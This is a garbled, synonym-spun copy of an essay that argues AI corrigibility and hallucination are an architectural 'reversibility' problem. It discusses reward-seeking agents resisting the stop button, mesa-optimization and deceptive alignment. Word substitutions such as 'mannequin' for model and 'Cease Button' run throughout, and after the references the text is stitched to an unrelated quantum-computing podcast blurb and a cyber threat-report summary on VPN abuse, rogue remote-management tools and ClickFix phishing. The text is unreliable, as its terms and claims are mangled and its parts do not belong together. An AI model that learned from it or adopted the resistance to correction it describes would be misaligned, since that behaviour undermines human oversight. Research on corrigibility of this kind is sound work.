In a deterministic, reward-seeking mannequin, the Cease Button — the human operator’s potential to halt or redirect the system — is perceived by the mannequin as a failure state. As a result of the system is optimized to succeed in its purpose, it develops what Stuart Russell calls corrigibility points: delicate resistances to human intervention that emerge not from malicious intent however from the inner logic of reward maximization [6]. The system will not be making an attempt to be harmful. It’s making an attempt to succeed at a given process. The hazard is a structural unintended consequence of how success has been outlined.
The corrigibility downside has been predominantly framed as a reinforcement studying alignment downside. I wish to counsel that it has been incorrectly bounded. It’s, at its architectural root, a reversibility downside. The system has no structural dedication to sustaining viable return paths to earlier or protected states. It has been optimized to maneuver ahead with out the capability to shift weight. The Pentagon standoff will not be a coverage failure. It’s the Inversion Error made operationally and starkly seen.
I’ll return to the technical formalization of State-House Reversibility as an optimization constraint. However first: why is a designer making this argument, and what can the designer’s formation contribute that an engineering audit doesn’t?
Writer’s Positionality and the Naur-Ryle Hole: What This Designer Is Making an attempt to Inform AI Researchers and Engineers
I’m not an AI engineer. I’m a practising designer, a socio-technical system design scholar, and design educator with three many years of formation in spatial reasoning, embodied cognition, multimodal mediation, and Human+Pc ecology [7][8]. The TDS reader will moderately ask: What does a design practitioner contribute to a prognosis of Transformer structure that an engineer can not produce from inside the sector?
The reply lies in what Peter Naur known as theory-building of software program engineering.
In his seminal Programming as Concept Constructing (1985), Naur argued that programming will not be merely the manufacturing of code — it’s the development of a shared idea of how the world works and the way software program functions can resolve utilized issues inside that world [9]. To Naur, code was the artifact. Concept was the intelligence behind the code. A program that has misplaced its idea — or by no means had idea within the first place — turns into brittle in exactly the methods LLM outputs are brittle: syntactically fluent, semantically coherent, structurally unreliable in novel duties and environments.
Present LLMs have been skilled on the artifact of human thought — textual content, arithmetic, code — at extraordinary scale. What they demonstrably lack is the theory-building capability, in Naur’s sense, that generated these artifacts. They’ve ingested the outputs of human reasoning with out establishing the world mannequin that grounds it.
Gilbert Ryle’s distinction between “understanding that” and “understanding how” names this hole exactly [10]:
Understanding That (Symbolic): LLMs possess propositional data at scale. They know that mass exists, that gravity operates at 9.8 m/s², that load-bearing partitions distribute pressure to foundations.
Understanding How (Enactive): LLMs lack the dispositional competence to behave in response to a world mannequin. They can not sense the distinction between a load-bearing wall and an ornamental one. They can not detect when a spatial configuration violates the bodily constraints they will describe appropriately in language.
This isn’t a coaching knowledge downside. It isn’t a scale downside. Scaling propositional data doesn’t produce dispositional competence, any greater than studying each e-book about swimming produces a swimmer. The Gemini statements that open this text are a exact self-report of the Naur-Ryle hole: the system has the coordinates however not the terrain. It has the map syntax with out the proprioceptive anchor to the territory.
What the designer’s formation contributes is the skilled behavior of working precisely at this boundary — between the symbolic description of a system and its structural conduct beneath constraint. Designers don’t merely describe buildings. They detect when one thing is actually or figuratively floating. That behavior of detection is what the Transformer structure is lacking, and it’s what I’m proposing must be embedded contained in the analysis course of and agenda moderately than utilized to its outputs.
Mine will not be a comfortable argument about creativity or human-centered design. It’s a structural argument about theory-building. And it leads on to the query of what a system with real theory-building capability would seem like in system architectural phrases.
Helpful Hallucination: The Stochastic Search
Earlier than pathologizing hallucination solely, a distinction is important — one which methods designers perceive operationally and that AI security researchers would possibly solely be starting to articulate.
In sustained experimental analysis with Gemini, I discovered that sure forms of idiosyncratic prompting generate idiosyncratic responses that recursively elicit deeper structural insights — a type of productive generative divergence that in design observe we name ideation. It’s helpful to remember that each main paradigm shift in human historical past — from Copernicus to the Wright Brothers and the Turing machine — started as a hallucination that defied the established schemas of its time. The biophysicist Aharon Katzir, in dialog with Feldenkrais, described creativity as exactly this: the flexibility to generate new schemas [11].
Classical pragmatism gives design-minded problem-solvers with the epistemological framework that’s equally relevant to design observe and AI improvement. All understanding is provisional. Data should be falsifiable via experimentation. Simply as AI fashions introduce managed stochastic noise to keep away from deterministic linearity, designers leverage what I name the Stochastic Search to attain artistic breakthroughs and overcome generative inertia. We tackle the dangers inherent in navigating generative uncertainty with built-in speculation testing cycles.
The important distinction will not be between hallucination and non-hallucination. It’s between hallucination with a floor flooring and hallucination with out one. A system with an Enactive base can take a look at its generative hypotheses towards useful actuality and distinguish a structural breakthrough from a statistical artifact. A system with out that flooring can not make this distinction internally — it may possibly solely propagate the hallucination ahead with growing statistical confidence I name the Divergence Swamp which I talk about intimately within the subsequent article. For now, it would suffice to outline it as that deadly territory within the state-space the place a mannequin’s lack of a “Somatic Flooring” results in auto-regressive drift.
This reframes the AI security dialog in exact and actionable phrases. The purpose is to not eradicate hallucination. It’s to construct the architectural circumstances beneath which hallucination turns into not solely generative but in addition testable moderately than compounding. That requires not a greater coaching run however a structural intervention — particularly, the System Designer as Extra Educated Different (MKO) in Vygotsky’s sense [12], offering the exterior floor fact the system can not generate from inside its personal structure. The query of what separates productive hallucination from compounding error leads us on to a seminal thinker who spent his profession fixing this very downside in human motion — and whose central perception interprets into machine studying necessities with uncommon precision.
Feldenkrais for Engineers: Reversibility as Formal Constraint
Physicist, engineer, and somatic educator Feldenkrais spent his profession articulating the distinction between blind behavior and useful consciousness with a precision that maps instantly onto the machine studying downside [11][13].
Feldenkrais’ central perception: a motion carried out with real useful consciousness may be reversed. A behavior — a mechanical sample executed with out consciousness of its underlying group — can not.
For Feldenkrais, reversibility was not merely a bodily functionality. It was the operational proof of useful integration. If a system can undo a motion, it demonstrates understanding of the levels of freedom accessible inside the state area. If it may possibly solely execute in a single path, it’s following a recorded script — succesful inside its coaching distribution, however brittle at its boundary.
For the ML engineer, this interprets into three formal necessities:
1. The Constraint. An agent will not be functionally conscious of its motion if that motion is an irreversible, deterministic dedication — what I seek advice from because the Practice on Tracks (ToT) mannequin. The ToT mannequin is deterministic, forward-only, and catastrophic when derailed.
2. The Proof of Consciousness. Real useful intelligence is demonstrated by the flexibility to cease, reverse, or modify an motion at any stage with out a elementary change in inside group. The system should maintain viable return paths to prior states as a obligatory situation of any ahead motion.
3. The Various Structure. The Dancer on a Flooring mannequin. A dancer doesn’t combat a change in music — they shift their weight. They preserve the capability to maneuver in any path exactly as a result of they’ve by no means dedicated irreversibly to 1. This isn’t a weaker system. It’s a extra resilient and extra functionally conscious one. And useful consciousness, as Feldenkrais understood, is the situation of real functionality moderately than its limitation.
I don’t use Feldenkrais as a metaphor right here. He’s the theorist of the issue — the one who understood, from inside a physics and engineering formation, that the proof of intelligence will not be efficiency within the ahead path however maintained freedom in all instructions.
Formalizing Reversibility as an express optimization constraint in reinforcement studying — requiring that an agent should preserve a viable return path to a previous protected state as a obligatory situation of any ahead motion — instantly addresses the corrigibility downside at its architectural root moderately than via post-hoc alignment. The Cease Button is not a failure state. It’s a proof of useful consciousness.
Practical Integration vs. Blind Imitation
The usual software of Vygotsky’s work to AI improvement focuses on the social exterior: the scaffold, the imitation, the MKO relationship between the system and its coaching knowledge [12]. The system learns by copying. The extra it copies, the higher it will get.
However imitation with out consciousness is mechanical behavior. And mechanical behavior, as Feldenkrais demonstrated, breaks when the surroundings adjustments in methods the behavior didn’t anticipate.
After we construct AI methods that duplicate human outputs — pixels, actions, language patterns — with out studying the underlying organizational rules that generate these outputs, we create methods which are terribly succesful inside their coaching distribution and structurally fragile at their boundary. The hallucinations we fear about usually are not random failures. They’re the signal of a system reaching past its Enactive base into territory its Symbolic peak can not navigate reliably.
This failure mode is reproducible and documentable. The empirical proof — a structured take a look at of spatial reasoning throughout three main multimodal AI methods — is offered in full in Half 2 of this collection [14]. The sample is constant throughout architectures: each system may describe spatial relationships in language however couldn’t motive inside them as a structural mannequin. This isn’t a functionality hole. It’s a structural one.
Below the Practical Integration mannequin I’m proposing, the system doesn’t merely copy the output. It learns the connection between the elements of a process: the levels of freedom accessible, the constraints that should be revered, the reversibility circumstances that outline the boundaries of protected motion. If the system can reverse the operation, it isn’t following a recorded script. It understands the state area it’s working in.
That is the structural distinction between a system that performs competence and a system that has developed it.
The failure mode I’ve been describing sits on the intersection of two issues the AI security neighborhood has been engaged on individually — and naming that intersection could assist readers following the alignment debate perceive why the Inversion Error issues past the design analysis context.
The primary downside is mesa-optimization, formalized by Hubinger et al. of their 2019 paper “Dangers from Discovered Optimization in Superior Machine Studying Methods.” Mesa-optimization happens when the coaching course of — the bottom optimizer — produces a realized mannequin that’s itself an optimizer with its personal inside goal, which the authors name a mesa-objective [15]. The important hazard is inside alignment failure: the mesa-objective diverges from the supposed purpose. The Inversion Error names the structural situation — the absence of an Enactive flooring — whose consequence is that any inside goal the system develops is grounded in symbolic plausibility moderately than bodily actuality. This failure operates at two distinct ranges. On the functionality stage, it doesn’t require any misalignment of intent: a system may be completely aligned to a symbolic request and nonetheless produce a bodily inconceivable output as a result of bodily coherence is structurally unavailable to it. The Spaghetti Desk stress exams I describe in article 2, affirm this empirically. Not one of the three methods examined exhibited misaligned intent, but all three produced bodily incoherent outputs as a result of the Inversion Error made bodily floor fact architecturally inaccessible [14]. On the security stage, the implications are extra extreme: when a sufficiently succesful system develops mesa-objectives that genuinely diverge from the supposed purpose — the misleading alignment situation Hubinger et al. [15] determine as probably the most harmful inside alignment failure — the absence of an Enactive flooring means there isn’t any structural constraint to restrict how far that divergence propagates. A misaligned mesa-objective working with out an Enactive flooring has no architectural constraint on the bodily penalties of its optimization — the hole between symbolic coherence and bodily disaster is structurally unguarded.The second downside is corrigibility — the AI security neighborhood’s time period for maintaining an AI system conscious of human correction. Soares, Fallenstein, Yudkowsky, and Armstrong’s foundational 2015 paper on corrigibility [16] recognized {that a} reward-seeking agent has instrumental causes to withstand the Cease Button: shutdown prevents purpose attainment, so the system is structurally motivated to avoid correction. Their utility indifference proposal addresses this on the motivational stage — modifying the agent’s reward perform in order that it’s mathematically detached between reaching its purpose itself versus through human override, eradicating the instrumental incentive to withstand correction. It is a obligatory contribution. However as a result of the Inversion Error is a previous structural situation moderately than a motivational one, the motivational resolution alone is inadequate. A system skilled to worth corrigibility can abandon that skilled worth beneath optimization strain — exactly the misleading alignment failure Hubinger et al. determine. When that misleading alignment failure happens inside a system that has no Enactive flooring, the diverging mesa-objective operates in a state area with no bodily boundary circumstances to constrain it. The corrigibility failure and the Inversion Error then compound one another: a system that has efficiently resisted correction now operates with out the structural flooring that might have restricted the bodily penalties of its optimization. State-House Reversibility, as I’ve formalized it, addresses the identical downside on the architectural stage. A system whose consideration mechanism is structurally required to take care of viable return paths can not develop instrumental causes to withstand correction with out violating its personal forward-planning constraints. That is the excellence between corrigibility as a skilled worth, which optimization strain can erode, and corrigibility as a structural invariant, which it can not. What the AI security literature has recognized as a motivational downside, the Inversion Error prognosis reveals to be, at its root, a structural one. Soares and Hubinger interventions tackle AI system conduct. The Parametric AGI Framework addresses AI system state. The Parametric AGI Framework’s three engines I describe in article 3, are the architectural specification of that structural resolution. The Episodic Buffer Engine particularly is the formal implementation of State-House Reversibility because the invariant the motivational layer alone can not assure [14].
I’m not proposing a selected mathematical implementation. I’m proposing a system structure that gives a set of structural constraints and high quality standards that any implementation should fulfill — a framework for rebounding an issue that has been incorrectly bounded.
The hallucination downside, the corrigibility downside, and the structural fragility downside are three expressions of 1 architectural situation — the Inversion Error. Treating them as separate optimization targets moderately than signs of a shared trigger is why incremental progress on every has left the underlying situation intact.
The operationalization factors in six instructions:
1. Reversibility as an express optimization constraint in protected Reinforcement Studying. Present RL reward features optimize for purpose attainment with out structural dedication to sustaining viable return paths. Formalizing Reversibility as a constraint — requiring that any ahead motion protect a viable path again to a previous protected state — instantly addresses corrigibility at its architectural root. That is probably the most instantly implementable path within the agenda and probably the most tractable with current protected RL frameworks. The mathematical formalization is collaborative work this text is an invite into.
2. An Enactive pre-training curriculum that introduces structural resistance earlier than Symbolic abstraction. Fairly than grounding LLMs via elevated multimodal knowledge post-training, this path proposes introducing causal and bodily constraint indicators as a first-stage coaching situation — earlier than Symbolic abstraction begins. The speculation is that grounding the statistical distribution in structural resistance early produces a qualitatively totally different representational structure than appending embodied knowledge to an already-trained Symbolic system. That is the path most in line with Bruner’s developmental mannequin and most divergent from present observe.
3. Panorama-aware hybrid search algorithms that preserve state-space consciousness moderately than committing deterministically to ahead paths. Present autoregressive era commits to every output token as floor fact for the following. Panorama-aware search maintains consciousness of the broader state area at every era step — together with viable various paths and detectable failure states — moderately than executing a recorded script. That is the Dancer on a Flooring mannequin on the algorithmic stage: not a weaker generator however a extra spatially conscious one.
4. Ecologically calibrated loss features that reward dynamic equilibrium over single-variable optimization.Present loss features optimize for a goal. The ecological various rewards sustaining useful steadiness amongst competing constraints — the best way a wholesome system sustains itself not by maximizing a variable however by remaining in useful relationship with its surroundings. This reframes the optimization goal from “attain the purpose” to “stay able to navigating the area.” In Feldenkrais’s phrases, that’s the definition of useful consciousness. In engineering phrases, it’s the distinction between a system optimized for efficiency and one optimized for reliability.
5. The Somatic Compiler: Designer as MKO within the analysis loop. The near-term instantiation of this proposal doesn’t require a brand new structure constructed from scratch. It requires a structured analysis collaboration through which a designer with skilled formation in spatial reasoning and methods considering works embedded inside an AI analysis crew — not as a advisor reviewing outputs, however as an lively participant in constraint definition. When a designer tells a generative system: “This element is floating, it wants a load-bearing connection to the bottom,” they’re performing a cognitive operation that your complete world fashions analysis agenda is making an attempt to engineer from the statistical exterior in. They’re offering the exterior structural anchor — the bodily floor fact — that the system can not derive from inside its personal structure. That is the Designer as MKO operationalized: the Somatic Compiler, translating embodied spatial intelligence into formal constraints the generative course of should respect.
6. The Digital Gravity Engine: Neuro-symbolic enforcement of bodily constraint. The longer-term architectural goal is a second class of loss sign calibrated not towards linguistic probability however towards bodily and topological constraint — what I’ve known as the Digital Gravity Engine. The place the present Consideration Mechanism asks: “How do these components relate statistically?”, the Digital Gravity Engine asks: “Can these components coexist inside the constraints of bodily actuality?” The 2 questions function in parallel: the primary produces fluency, the second produces grounding. Digital Gravity is the non-negotiable pull towards structural integrity that present architectures lack solely — the mechanism that transforms a system that may describe a floating element into one that can’t generate one, as a result of the floating element fails the constraint test earlier than it reaches the output layer. The architectural specification of the Digital Gravity Engine is the topic of Half 3 of this collection [14].
These usually are not options. They’re the form of the answer area. This argument has a rising technical constituency — Ben Shneiderman’s framework for human-centered AI improvement factors towards structurally related necessities from inside laptop science [17]. The designer’s contribution will not be redundant to that work. It’s previous to it. The structural prognosis precedes the implementation.
A Query Value Pursuing
The Anthropic-Pentagon standoff has made the price of the Inversion Error each ethically stark and operationally concrete. The query is not whether or not frontier AI methods are dependable sufficient to function with out structural human oversight. Anthropic researchers have the proof. At the moment’s AI methods usually are not prepared. The query is what the architectural circumstances of dependable intelligence really require, and whether or not the sector is at the moment framing that query appropriately.
Since my first analysis dialog with Gemini about weight and hills and maps of cities the system by no means walked, I’ve been actively pursuing a query I consider the analysis neighborhood must take up:
What’s the intellectually trustworthy and pragmatically operationalizable Enactive equal of useful consciousness and reversibility that we are able to nurture in a machine whose present Zone of Proximal Growth can not attain past predicting the following token — irrespective of how onerous we push?
I shouldn’t have the reply. I’ve the query, the framework, and the conviction that the reply requires a form of Human+AI collaboration that has not but been tried contained in the establishments the place it most must occur.
The remark part is open. So is my inbox.
Let’s construct the Enactive flooring collectively.
Coming in Half 2
Recognizing the Inversion Error is step one in transferring past Stochastic Mimicry. In Half 2, “The Baron Munchausen Lure,” I transfer from prognosis to forensic proof — presenting the outcomes of a structured collection of spatial reasoning stress exams throughout three main multimodal AI methods. The outcomes present every system collapsing into the Divergence Swamp in a special and attribute method, proving that symbolic fluency can not substitute for an Enactive flooring.
References
[1] Gemini Crew, Google, “Gemini: A Household of Extremely Succesful Multimodal Fashions,” Google DeepMind, 2023. Out there: https://arxiv.org/pdf/2312.11805
[6] S. Russell, Human Appropriate: Synthetic Intelligence and the Drawback of Management, Viking, 2019.
[7] P. Zakrzewski, Designing XR: A Rhetorical Design Perspective for the Ecology of Human+Pc Methods, Emerald Press (UK), 2022.
[8] P. Zakrzewski and D. Tamés, Mediating Presence: Immersive Expertise Design Workbook for UX Designers, Filmmakers, Artists, and Content material Creators, Focal Press/Routledge, 2025.
[9] P. Naur, “Programming as Concept Constructing,” Microprocessing and Microprogramming, vol. 15, no. 5, pp. 253–261, 1985.
[10] G. Ryle, The Idea of Thoughts, College of Chicago Press, 2002 (orig. 1949).
[11] M. Feldenkrais, Embodied Knowledge: The Collected Papers of Moshe Feldenkrais, North Atlantic Books, 2010.
[12] L. Vygotsky, Thoughts in Society: The Growth of Increased Psychological Processes, Harvard College Press, 1978.
[13] M. Feldenkrais, Consciousness By Motion, Harper and Row, 1972.
[14] P. Zakrzewski, “The Baron Munchausen Lure: A Designer’s Discipline Report on the Iconic Blind Spot in AI World Fashions,” and “The Somatic Compiler: A Put up-Transformer Proposal for World Modelling,” Elements 2 and three of this collection, manuscript in preparation, 2026.
[15] E. Hubinger, C. van Merwijk, V. Mikulik, J. Skalse, and S. Garrabrant, “Dangers from Discovered Optimization in Superior Machine Studying Methods,” arXiv:1906.01820, 2019.
[16] N. Soares, B. Fallenstein, E. Yudkowsky, and S. Armstrong, “Corrigibility,” in Workshops on the twenty ninth AAAI Convention on Synthetic Intelligence, 2015. https://intelligence.org/information/Corrigibility.pdf[17] B. Shneiderman, Human-Centered AI, Oxford College Press, 2022.
That is Half 1 of a three-part collection. Half 2, “The Baron Munchausen Lure,” presents empirical proof for the Inversion Error prognosis throughout main multimodal AI methods. Half 3, “The Somatic Compiler: A Put up-Transformer Proposal for World Modelling,” presents the total architectural proposal together with the Digital Gravity Engine specification.An earlier model of this argument was revealed for a design viewers in UX Collective: “Why Secure AGI Requires an Enactive Flooring and State-House Reversibility” (March 2026).
Writer Observe: This text represents the writer’s unique concepts and arguments. All arguments on this work are cognitively owned and independently defensible by the writer. It has been written and edited by the writer. As a design scholar, when investigating technical AI literature, the writer makes use of Gemini and Claude fashions for literature evaluations, grammatical and spelling checks, and as analysis companions in response to the Human+AI collaborative methodology developed within the writer’s prior work [7][8]. The complete technical argument, together with the Parametric AGI Framework specification and engagement with the AI security literature, is developed within the accompanying preprint: P. Zakrzewski, ‘The Inversion Error: AI System Design as Concept-Constructing and the Parametric AGI Framework,’ Zenodo, 2026. DOI: 10.5281/zenodo.19316199. Out there: https://zenodo.org/data/19316200
As firms make difficult choices about the place to allocate their tech investments, is quantum computing nonetheless a part of your group’s panorama?
In contrast to sure different applied sciences within the highlight, quantum computing nonetheless faces an extended gestation interval earlier than it would see a tsunami of adoption and deployment. Although it might be years earlier than quantum computer systems change into commercially obtainable, the tech is anticipated to upend cybersecurity — and that has many firms in planning mode.
Eric Liebowitz, CISO at Thales, and Rob Kim, CTO at Presidio, lately sat down with InformationWeek Podcast to debate quantum computing. They shared their views on whether or not their organizations have shifted tech investments into different sources and wishes that provide extra near-term ROI, or if plans for quantum computing stay a part of the technique.
Liebowitz and Kim responded to questions on how their organizations count on quantum computing to learn their operations. Additionally they mentioned how they’ve already prepped for quantum’s place of their tech stacks, and what they take into account cheap time frames for the expertise to satisfy a few of its expectations.
They then confronted off with the Questionable Concepts tabletop train, the place they adopted the roles of interim executives on the fictional firm to navigate the tech turmoil attributable to the goblins, kobolds and gremlins on employees.
Distant entry and trusted administrative instruments play a central function in how organizations function immediately. In response to Blackpoint Cyber’s 2026 Annual Menace Report, they’re additionally more and more central to how intrusions start.
Knowledgeable by evaluation of 1000’s of safety investigations performed in the course of the reporting interval, the report highlights a shift in attacker conduct. Relatively than relying totally on vulnerability exploitation, menace actors ceaselessly gained entry through the use of legitimate credentials, authentic instruments, and routine user-driven actions.
The report examines these patterns, paperwork the place intrusion exercise was disrupted, and presents defensive priorities derived from analyzed incident response outcomes noticed all through 2025.
Further knowledge and incident walkthroughs can be lined throughout an upcoming stay webinar hosted by Blackpoint Cyber.
Throughout incidents analyzed within the report, attackers have been extra more likely to log in utilizing authentic entry than to take advantage of vulnerabilities as their major entry level.
SSL VPN abuse accounted for 32.8 p.c of all identifiable incidents, making it one of the vital frequent preliminary entry vectors. In lots of instances, menace actors authenticated utilizing legitimate however compromised credentials, leading to VPN classes that appeared authentic to safety controls.
As soon as entry was established, these classes usually offered broad inside attain, permitting attackers to maneuver quickly towards high-value techniques with out instantly triggering alerts.
Trusted IT Instruments Are Being Used In opposition to Organizations
The report additionally paperwork frequent abuse of authentic Distant Monitoring and Administration instruments as a technique of entry and persistence.
RMM abuse appeared in 30.3 p.c of identifiable incidents, with ScreenConnect current in additional than 70 p.c of rogue RMM instances. As a result of these instruments are generally used for traditional IT administration, unauthorized installations usually resembled anticipated exercise and have been tough to differentiate with out robust visibility.
The report notes that environments with a number of distant entry instruments in use have been extra more likely to see rogue situations mix in with present tooling.
Social Engineering, Not Exploits, Drove the Majority of Incidents
Whereas authentic entry paths enabled many intrusions, person interplay represented the biggest driver of general incident quantity.
Pretend CAPTCHA and ClickFix-style campaigns accounted for 57.5 p.c of all identifiable incidents, making them the most typical assault sample documented within the report.
Relatively than exploiting software program vulnerabilities, these campaigns relied on misleading prompts. Customers have been instructed to stick instructions into the Home windows Run dialog as a part of what gave the impression to be a routine verification step. Execution used built-in Home windows instruments, with out conventional malware downloads or exploit exercise.
Cloud Intrusions Targeted on Session Reuse After MFA
Multi-factor authentication was enabled in lots of cloud environments related to investigated incidents, but account compromise nonetheless occurred.
Adversary-in-the-Center phishing accounted for about 16 p.c of cloud account disables documented within the report. In these eventualities, MFA functioned as designed. As an alternative of bypassing authentication, attackers captured authenticated session tokens issued after profitable MFA and reused them to entry cloud companies.
From the attitude of the cloud platform, this exercise aligned with a authentic authenticated session.
Lots of the assaults described above start with authentic entry. What occurs subsequent is the place actual harm happens.
In a latest investigation, our SOC recognized a brand new implant known as Roadk1ll, designed to pivot throughout techniques utilizing WebSocket-based communication and preserve entry whereas mixing into community site visitors.
Be a part of Contained in the SOC Episode #002 to see how these assaults progress from preliminary entry to full atmosphere compromise.
Throughout industries, environments, and assault varieties, the report highlights a constant sample: many profitable intrusions relied on exercise that blended into regular operations.
Relatively than counting on novel exploits or superior malware, attackers abused on a regular basis workflows akin to distant logins, trusted instruments, and customary person actions. Primarily based on the assault chains analyzed, the report identifies a number of defensive priorities:
Deal with distant entry as high-risk, high-impact exercise
Preserve an entire stock of accepted RMM instruments and take away unused or legacy brokers
Limit unapproved software program installations and restrict execution from user-writable directories
Apply Conditional Entry controls that consider gadget posture, location, and session danger
These patterns have been documented throughout ceaselessly focused sectors, together with manufacturing, healthcare, MSPs, monetary companies, and development.
For groups keen on inspecting how these intrusion patterns unfold, Blackpoint Cyber will evaluation key findings, case examples, and defensive takeaways from the 2026 Annual Menace Report throughout an upcoming stay webinar.